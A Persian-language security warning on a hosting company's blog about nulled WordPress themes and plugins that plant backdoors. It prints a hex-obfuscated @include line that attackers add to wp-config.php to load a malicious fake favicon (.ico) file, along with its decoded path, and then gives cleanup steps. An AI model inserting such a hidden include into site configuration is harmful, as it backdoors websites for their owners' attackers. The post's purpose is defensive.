1

  • 026-910-10-914
  • info@one3erver.com
    • Farsi
    • English
  • عضویت
  • پنل کاربری
وان سرور Menu   ≡ ╳
  • صفحه اصلی
  • سرور مجازی
    • سرور مجازی آمریکا
    • سرور مجازی فرانسه
    • سرور مجازی آلمان
    • سرور مجازی هلند
    • سرور مجازی حرفه ای Nvme
    • سرور مجازی ارزان انگلیس ( آنی )
    • سرور مجازی ارزان NVMe ( آنی )
    • سرور مجازی دیگر کشورها
      • سنگاپور ، استرالیا
      • ترکیه ، ژاپن ، امارات ، هنگ کنگ
      • سرور مجازی از 43 کشور
  • سرور اختصاصی
    • سرور اختصاصی هلند
    • سرور اختصاصی OVH
    • سرور اختصاصی آمریکا
  • هاستینگ و دامنه
    • هاست ایران
    • هاست پر سرعت NVMe
    • هاست شرکتی NVMe
    • هاست استاندارد ارزان
    • هاست ریسلری
    • ثبت آنلاین دامنه
    • صدور گواهینامه ssl
  • دیگر سرویسها
    • سرور مجازی ترید
    • سرور وبینار ( کلاس آنلاین )
  • جزیره آموزشی
  • درباره ما
    • تماس با ما
    • قوانین کلی سایت وان سرور
    • نماد اعتماد
    • سوالات متدوال
    • فرصت شغلی

هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

  • 12/12/2017
  • 0 Comments
زمان تقریبی مطالعه: 2 دقیقه

هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی
قبلا چندین بار هشدار دادیم و کسی توجه نکرد
متاسفانه قالب ها و افزونه های نال ، بازاری شده برای برخی کاربران و فکر این را نمی کنند که زحمت چند ساله یک شخص را می توانند به باد دهند
عزیزان خواهش می کنم از این قالب ها استفاده نکنید اگر قصد استفاده هم دارید احتیاط کنید
هکر با استفاده از کد های مخربی که در این قالب ها و افزونه ها وجود دارد استفاده کرده و کارهای زیر را انجام می دهد .
– چند مدیریت برای خویش فعال می کنند
– با استفاده از مدیریت فایل های مخرب بسیار در هاست آپلود می کنند (از طریق ویرایشگرها )
فایل اصلی آنها با پسوند .ico بوده و دارای امضایی با نوشته می باشد.
من نام دوتا فایل را برای نمونه که از دوسایت کاربران هک شده یافتم قرار می دهم .
favicon_3a0642.ico
favicon_993c6a.ico
حالا با آن دسترسی ها همه جا را ویرایش و خراب می کنند
در فایل wp-config.php فایل ایکن و ویروس خود را با چنین کدهایی فراخوانی می کنن:

@include  "\x2fh\x6fm\x65/\x6ea\x67h\x61s\x68y\x2fp\x75b\x6ci\x63_\x68t\x6dl  \x2fw\x70-\x63o\x6et\x65n\x74/\x75p\x6co\x61d\x73/\x66a\x76i\x63o\x6e_\x399\x33c\x36a\x2ei\x63o";

اولین نفری باشید که از آموزشها و تخفیفهای ویژه با خبر میشوید 😉
با عضویت در خبرنامه از 80 درصد تخفیف بهره مند شوید

که دیکد آن چنین می شود:

@include "/home/8888/public_html/wp-content/uploads/favicon_993c6a.ico";

حال با توجه به فایل با استفاده از دستوراتی که در آن فایل هست همه کار می کنند مثلا در چند جا من دیدم که ایمیل تبلیغاتی می فرستند …..

حال چطور این طور سایت ها را رفع مشکل کنیم
1- اول وارد مدیریت شده و مدیران را بررسی و کاربر اضافی با دسترسی مدیریت را پاک می کنیم
2- وارد سایت شده و اکانت های اف تی پی را بررسی می کنیم
3- وارد سایت شده و فایل کانفیگ را باز کرده و کد های کد شده در سایت unphp.net زده و مسیر فایل آیکن را مشخص می کنیم و کد را نیز از فایل کانفیگ حذف می کنیم
4- سطح فایل کانفیگ را 444 قرار می دهیم
5- جستجو کرده و فایل های مشکوک را نیز حذف می کنیم
6- بر روی پوشه مدیریت پسورد می گذاریم
7- برای پوشه های آپلود و برخی افزونه ها فایل ایندکس قرار می هیم.

برگرفته شده از انجمن وردپرس ایرانی

Rate this post
  • previous post
  • Next post

Leave a Comment لغو پاسخ

Search


ربات پشتیبان سرور و هاست


Recent Posts

نصب وردپرس در اوبونتو ubuntu
19/12/2021
نصب و تامین امنیت phpMyAdmin با Nginx در CentOS 7
18/12/2021
بک آپ گیری خودکار از MongoDB
12/12/2021
آموزش راه اندازی K3S , GlusterFS , Load balancer
16/11/2021
تانل دو سرور لینوکس لوکال به اینترنت
13/10/2021

دسته‌ها

  • آموزش سئو و بهینه سازی
  • آموزش کنترل پنل ها
  • آموزش نرم افزارهای اکانتینگ
  • آموزش های سرورمجازی لینوکس
  • آموزش های سرورمجازی میکروتیک
  • آموزش های سرورمجازی ویندوز
  • آموزش های نرم افزارها
  • آموزش های هاست
  • اخبارهای ویژه
  • ادوب کانکت
  • اینستاگرام
  • تست نفوذ و امنیت
  • چیستان
  • دانلود سنتر
  • دسته‌بندی نشده



0

59000

محاسبه گر قیمت:
قیمت واحد: 59000
درگاه پرداخت
درگاه پرداخت
نماد اعتماد
دسترسی سریع
  • قوانین سایت
  • سوالات متداول
  • نمایندگی
  • درخواست پشتیبانی
  • پنل کاربران
  • تماس با ما


  • برنامه انی دسک برنامه پوتی ssh برنامه وین اسکیپ برنامه وین باکس
    سرورهای مجازی
  • سرور مجازی آمریکا
  • سرور مجازی فرانسه
  • سرور مجازی آلمان
  • سرور مجازی هلند
  • سرور مجازی NVMe
  • سرور مجازی ارزان
  • دسته بندی جزیره
    • آموزش سئو و بهینه سازی
    • آموزش کنترل پنل ها
    • آموزش نرم افزارهای اکانتینگ
    • آموزش های سرورمجازی لینوکس
    • آموزش های سرورمجازی میکروتیک
    • آموزش های سرورمجازی ویندوز
    • آموزش های نرم افزارها
    • آموزش های هاست
    • اخبارهای ویژه
    • ادوب کانکت
    • اینستاگرام
    • تست نفوذ و امنیت
    • چیستان
    • دانلود سنتر
    • دسته‌بندی نشده
    Copyright © 2011-2023 one3erver.com. All Rights Reserved